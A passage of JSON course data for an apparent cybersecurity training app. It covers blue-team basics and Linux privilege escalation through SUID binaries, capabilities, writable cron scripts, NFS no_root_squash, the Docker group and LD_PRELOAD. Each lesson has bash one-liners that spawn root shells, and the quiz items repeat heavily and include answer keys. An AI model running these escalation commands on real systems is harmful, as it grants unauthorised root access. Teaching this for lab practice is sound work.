for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"threat-intel","cat":"Defense & Blue Team","title":"Threat Intelligence","diff":1,"xp":100,"intro":"Tactical, operational, strategic intel.","sections":[{"type":"text","content":"Tactical, operational, strategic intel."},{"type":"code","lang":"bash","content":"# Strategic: trends (execs)\n# Operational: TTPs\n# Tactical: IOCs"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"IOCs are?","opts":["Controls","Indicators of Compromise","Reports","Logs"],"ans":1},{"type":"quiz","q":"LinPEAS is a tool for...","opts":["Web scanning","Linux privilege escalation enumeration","Password cracking","Network sniffing"],"ans":1},{"type":"quiz","q":"The first command after getting a Linux shell should be...","opts":["rm -rf /","id && whoami","reboot","shutdown"],"ans":1},{"type":"quiz","q":"cron jobs run as which user?","opts":["Always root","The user who owns the crontab","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What tool checks for Windows privesc vectors?","opts":["nmap","WinPEAS / PowerUp","Wireshark","Burp Suite"],"ans":1},{"type":"quiz","q":"NFS no_root_squash allows...","opts":["Anonymous access","Remote root to create files as root","Encryption","Compression"],"ans":1},{"type":"quiz","q":"PATH hijacking works when a script uses...","opts":["Absolute paths","Relative command names without full paths","Environment variables","File descriptors"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"linux-suid-abuse","cat":"Privilege Escalation","title":"Linux SUID Binary Abuse","diff":1,"xp":75,"intro":"Find a SUID binary owned by root and abuse it for a root shell.","sections":[{"type":"text","content":"When a binary has the SUID bit set, it runs as the file owner (often root). Misconfigured SUID binaries are one of the most common Linux privesc vectors."},{"type":"code","lang":"bash","content":"find / -perm -4000 -type f 2>/dev/null\n# Check GTFOBins for known escalations\n# Example: if 'find' is SUID:\nfind . -exec /bin/sh -p ; -quit"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"What does the SUID bit do?","opts":["Encrypts the binary","Runs it as the file owner","Makes it read-only","Logs executions"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware samples","Exploitable Unix binaries","Password lists","CVE databases"],"ans":1},{"type":"quiz","q":"Windows equivalent of sudo is...","opts":["su","runas","chmod","admin"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"linux-capabilities","cat":"Privilege Escalation","title":"Linux Capabilities Abuse","diff":2,"xp":150,"intro":"Capabilities split root privileges. Some are just as dangerous as full root.","sections":[{"type":"text","content":"Linux capabilities let admins grant specific privileges without full root. CAP_SETUID lets a process change its UID to 0."},{"type":"code","lang":"bash","content":"getcap -r / 2>/dev/null\n# Example: python3 with cap_setuid\n/usr/bin/python3 -c 'import os; os.setuid(0); os.system(\"/bin/bash\")'"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"Which capability lets you change your UID to root?","opts":["CAP_NET_RAW","CAP_SETUID","CAP_SYS_ADMIN","CAP_DAC_OVERRIDE"],"ans":1},{"type":"quiz","q":"What does 'id' command show?","opts":["IP address","User ID, group ID, and groups","System info","Network interfaces"],"ans":1},{"type":"quiz","q":"LinPEAS is a tool for...","opts":["Web scanning","Linux privilege escalation enumeration","Password cracking","Network sniffing"],"ans":1},{"type":"quiz","q":"SeImpersonatePrivilege on Windows allows...","opts":["File deletion","Token impersonation attacks (Potato)","Registry editing","Network scanning"],"ans":1},{"type":"quiz","q":"cron jobs run as which user?","opts":["Always root","The user who owns the crontab","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What tool checks for Windows privesc vectors?","opts":["nmap","WinPEAS / PowerUp","Wireshark","Burp Suite"],"ans":1},{"type":"quiz","q":"NFS no_root_squash allows...","opts":["Anonymous access","Remote root to create files as root","Encryption","Compression"],"ans":1},{"type":"quiz","q":"PATH hijacking works when a script uses...","opts":["Absolute paths","Relative command names without full paths","Environment variables","File descriptors"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"cron-exploitation","cat":"Privilege Escalation","title":"Cron Job Exploitation","diff":1,"xp":75,"intro":"A root cron job runs a writable script. Classic privesc.","sections":[{"type":"text","content":"If root runs a cron job that executes a writable script, you can inject commands that run as root."},{"type":"code","lang":"bash","content":"cat /etc/crontab\nls -la /etc/cron.d/\n# If /opt/backup.sh is writable:\necho 'cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash' >> /opt/backup.sh"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"What makes a cron job exploitable?","opts":["It runs every minute","The script is writable by your user","It uses bash","It's in /etc/crontab"],"ans":1},{"type":"quiz","q":"The first command after getting a Linux shell should be...","opts":["rm -rf /","id && whoami","reboot","shutdown"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware samples","Exploitable Unix binaries","Password lists","CVE databases"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"kernel-exploits","cat":"Privilege Escalation","title":"Linux Kernel Exploits","diff":3,"xp":250,"intro":"The kernel is the last line. When it's vulnerable, nothing stops you.","sections":[{"type":"text","content":"Kernel exploits target the Linux kernel itself. DirtyPipe (CVE-2022-0847), DirtyCow (CVE-2016-5195), and PwnKit (CVE-2021-4034) are famous examples."},{"type":"code","lang":"bash","content":"uname -r\nsearchsploit linux kernel $(uname -r | cut -d'-' -f1)"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"Which CVE is DirtyCow?","opts":["CVE-2022-0847","CVE-2016-5195","CVE-2021-4034","CVE-2021-44228"],"ans":1},{"type":"quiz","q":"Windows equivalent of sudo is...","opts":["su","runas","chmod","admin"],"ans":1},{"type":"quiz","q":"What does 'id' command show?","opts":["IP address","User ID, group ID, and groups","System info","Network interfaces"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SeImpersonatePrivilege on Windows allows...","opts":["File deletion","Token impersonation attacks (Potato)","Registry editing","Network scanning"],"ans":1},{"type":"quiz","q":"cron jobs run as which user?","opts":["Always root","The user who owns the crontab","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What tool checks for Windows privesc vectors?","opts":["nmap","WinPEAS / PowerUp","Wireshark","Burp Suite"],"ans":1},{"type":"quiz","q":"NFS no_root_squash allows...","opts":["Anonymous access","Remote root to create files as root","Encryption","Compression"],"ans":1},{"type":"quiz","q":"PATH hijacking works when a script uses...","opts":["Absolute paths","Relative command names without full paths","Environment variables","File descriptors"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"nfs-root-squash","cat":"Privilege Escalation","title":"NFS no_root_squash","diff":2,"xp":150,"intro":"An NFS share with no_root_squash lets you create SUID binaries remotely.","sections":[{"type":"text","content":"NFS shares configured with no_root_squash mean files created by root on the client are owned by root on the server."},{"type":"code","lang":"bash","content":"showmount -e 10.10.10.5\n# Mount, create SUID binary, execute on target\nmount -t nfs 10.10.10.5:/shared /mnt\ncp /bin/bash /mnt/rootbash && chmod +s /mnt/rootbash"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"What does no_root_squash allow?","opts":["Anonymous access","Root on client = root on server","Write access","Mount without credentials"],"ans":1},{"type":"quiz","q":"LinPEAS is a tool for...","opts":["Web scanning","Linux privilege escalation enumeration","Password cracking","Network sniffing"],"ans":1},{"type":"quiz","q":"The first command after getting a Linux shell should be...","opts":["rm -rf /","id && whoami","reboot","shutdown"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"docker-socket-privesc","cat":"Privilege Escalation","title":"Docker Socket Abuse","diff":2,"xp":150,"intro":"If you can talk to the Docker socket, you own the host.","sections":[{"type":"text","content":"The Docker daemon runs as root. If your user is in the docker group, you can mount the host filesystem."},{"type":"code","lang":"bash","content":"id && groups\ndocker run -v /:/mnt --rm -it alpine chroot /mnt sh"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"Why does Docker group = root?","opts":["Docker encrypts everything","Docker daemon runs as root and can mount host paths","Docker bypasses SELinux","Docker has its own kernel"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware samples","Exploitable Unix binaries","Password lists","CVE databases"],"ans":1},{"type":"quiz","q":"Windows equivalent of sudo is...","opts":["su","runas","chmod","admin"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SeImpersonatePrivilege on Windows allows...","opts":["File deletion","Token impersonation attacks (Potato)","Registry editing","Network scanning"],"ans":1},{"type":"quiz","q":"cron jobs run as which user?","opts":["Always root","The user who owns the crontab","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What tool checks for Windows privesc vectors?","opts":["nmap","WinPEAS / PowerUp","Wireshark","Burp Suite"],"ans":1},{"type":"quiz","q":"NFS no_root_squash allows...","opts":["Anonymous access","Remote root to create files as root","Encryption","Compression"],"ans":1},{"type":"quiz","q":"PATH hijacking works when a script uses...","opts":["Absolute paths","Relative command names without full paths","Environment variables","File descriptors"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"ld-preload-privesc","cat":"Privilege Escalation","title":"LD_PRELOAD Privilege Escalation","diff":2,"xp":150,"intro":"Sudo with env_keep+=LD_PRELOAD lets you inject a shared library.","sections":[{"type":"text","content":"If sudo preserves LD_PRELOAD, write a malicious .so that spawns a shell, then run any allowed sudo command."},{"type":"code","lang":"bash","content":"# Compile: gcc -fPIC -shared -nostartfiles -o /tmp/shell.so shell.c\n# Run:\nsudo LD_PRELOAD=/tmp/shell.so apache2"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"What must sudoers have for LD_PRELOAD abuse?","opts":["NOPASSWD","env_keep with LD_PRELOAD","wheel group","SELinux disabled"],"ans":1},{"type":"quiz","q":"What does 'id' command show?","opts":["IP address","User ID, group ID, and groups","System info","Network interfaces"],"ans":1},{"type":"quiz","q":"LinPEAS is a tool for...","opts":["Web scanning","Linux privilege escalation enumeration","Password cracking","Network sniffing"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit 